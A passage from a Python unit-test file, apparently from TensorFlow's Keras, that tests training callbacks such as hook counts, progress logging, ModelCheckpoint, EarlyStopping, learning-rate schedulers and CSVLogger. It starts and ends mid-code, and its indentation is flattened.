return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
if not context.executing_eagerly():
self.skipTest('Behavior changed in v2.')
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
steps_per_epoch=5,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.evaluate(
x,
y,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.predict(
x,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((200, 3))
y = array_ops.zeros((200, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = array_ops.ones((200, 3))
y = array_ops.zeros((200, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_data(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
training_dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
val_dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(training_dataset, epochs=2, validation_data=val_dataset)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_validation_split(self):
model = self._get_model(input_shape=(3,))
x = np.ones((100, 3))
y = np.zeros((100, 2))
expected_log = (
r'(?s).*1/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_training_validation(self):
model = self._get_model(input_shape=(2,))
def generator():
for _ in range(100):
yield [1, 1], 1
training = dataset_ops.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2) \
.repeat()
validation = dataset_ops.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
expected_log = (
r'(?s).*1/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x=training, validation_data=validation, epochs=2, steps_per_epoch=20)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_with_dataset_and_partial_batch(self):
model = self._get_model(input_shape=(2,))
def generator():
# Have a partial batch at the end.
for _ in range(9):
yield np.random.random(2), 1
training = dataset_ops.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
validation = dataset_ops.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x=training, validation_data=validation)
# Make sure the value of val_ metrics are not zeros.
log_content = printed.contents()
val_loss = re.findall(r'val_loss: (\d\.\d+)', log_content)
self.assertLen(val_loss, 1)
self.assertGreater(float(val_loss[0]), 0.0)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 6: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 7: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=15,
period=100) # The period should be ignored (this test tests this).
]
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 8: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegexp(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
def _get_dummy_resource_for_model_checkpoint_testing(self):
def get_input_datasets():
# Simple training input.
train_input = [[1.]] * 16
train_label = [[0.]] * 16
ds = dataset_ops.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(testing_utils.Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
return model, train_ds, callback, filepath
def _run_load_weights_on_restart_test_common_iterations(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
initial_epochs = 3
model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])
# The files should exist after fitting with callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=initial_epochs))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period ensuring the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
model.fit(train_ds, epochs=1, callbacks=[callback])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=1))
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_with_one_final_extra_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are closed, if a ModelCheckpoint with
# load_weights_on_restart=True is given (so the model is restored at the
# beginning of training).
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
self.assertNotAllClose(weights_after_one_more_epoch,
weights_with_one_final_extra_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period to ensure the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_before_additional_fit = model.get_weights()
model.fit(train_ds, epochs=1, callbacks=[callback])
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_fit_with_ModelCheckpoint_with_tf_config(self):
(model, train_ds, callback,
_) = self._get_dummy_resource_for_model_checkpoint_testing()
os.environ['TF_CONFIG'] = json.dumps({
'cluster': {
'worker': ['localhost:23333']
},
'task': {
'type': 'worker',
'index': 0
}
})
# `model.fit()` should work regardless of the presence of `TF_CONFIG`.
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_fit_with_ModelCheckpoint_with_dir_as_h5_filepath(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'temp.h5')
self.assertFalse(os.path.exists(filepath))
os.mkdir(filepath)
self.assertTrue(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegexp(IOError, 'Please specify a non-directory '
'filepath for ModelCheckpoint.'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_with_bad_path_placeholders(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'chkpt_{epoch:02d}_{mape:.2f}.h5')
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegexp(KeyError, 'Failed to format this callback '
'filepath.*'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.6
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
cbks = [
keras.callbacks.LearningRateScheduler(
lambda epoch, _: learning_rate_schedule.CosineDecay(0.01, 2)
(epoch))
]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
cosine_decay_np = 0.5 * (1 + np.cos(np.pi * (1 / 2)))
decayed_learning_rate = 0.01 * cosine_decay_np
assert (float(keras.backend.get_value(model.optimizer.lr)) -
decayed_learning_rate) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
